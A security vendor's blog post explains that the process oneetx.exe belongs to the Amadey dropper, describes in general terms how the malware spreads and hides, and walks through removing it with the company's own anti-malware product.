It appears that oneetx.exe does not belong to any program. Moreover, a Google search gives clear clues that this process belongs to malware that has acted as the backbone of a Russian botnet since 2018. The most obvious guess is, of course, Emotet, which is known for having possibly the most extensive botnet on the planet. In this case, however, a short investigation showed that oneetx.exe is related to the Amadey dropper.

What is Amadey?

Amadey is a dropper (a.k.a. downloader) malware that has only one purpose – delivering other malware to the infected system. It often acts as a precursor that makes sure the system is not in a banned region and is not a debugging environment. It can deliver a wide range of threats – from the aforementioned Emotet to RedLine stealer and even STOP/Djvu ransomware. Even after delivering the payload, it remains active, waiting for further commands from the hackers.

Aimed at a long-term stay in the system, Amadey does its best to hide from users and anti-malware software. Choosing an unremarkable name is only a small part of its disguise. First of all, each of its samples is repacked in a specific way, making it harder for antiviruses to detect. Amadey typically arrives in phishing emails with attached Office documents. Upon execution, the malware moves its files from the original directory to another folder, chosen depending on the antivirus software present in the system. All these actions make it a pretty tough nut for “classic” antiviruses.

IoC Amadey Dropper

How to remove Oneetx.exe?

You will likely fail to remove Oneetx.exe from your system manually. It performs a series of actions to secure persistence, which forces the user to locate and undo every change it made to the system before touching the files. For that reason, I’d recommend using GridinSoft Anti-Malware – a program that specialises in removing threats like the Amadey dropper.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the action that the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

The program will not only help you with removing this malware, but also prevent any further infections. Its detection system makes it effective even against the newest tricks – regardless of the way they’re packed. However, anti-malware software should be your last line of defense. To stay secure, it is better to avoid any muddy waters at all. In the case of Amadey malware, the key is to be vigilant when you deal with email messages. Read our detailed analysis of modern spam emails and the way to recognise them.

The post Oneetx.exe appeared first on Gridinsoft Blog.
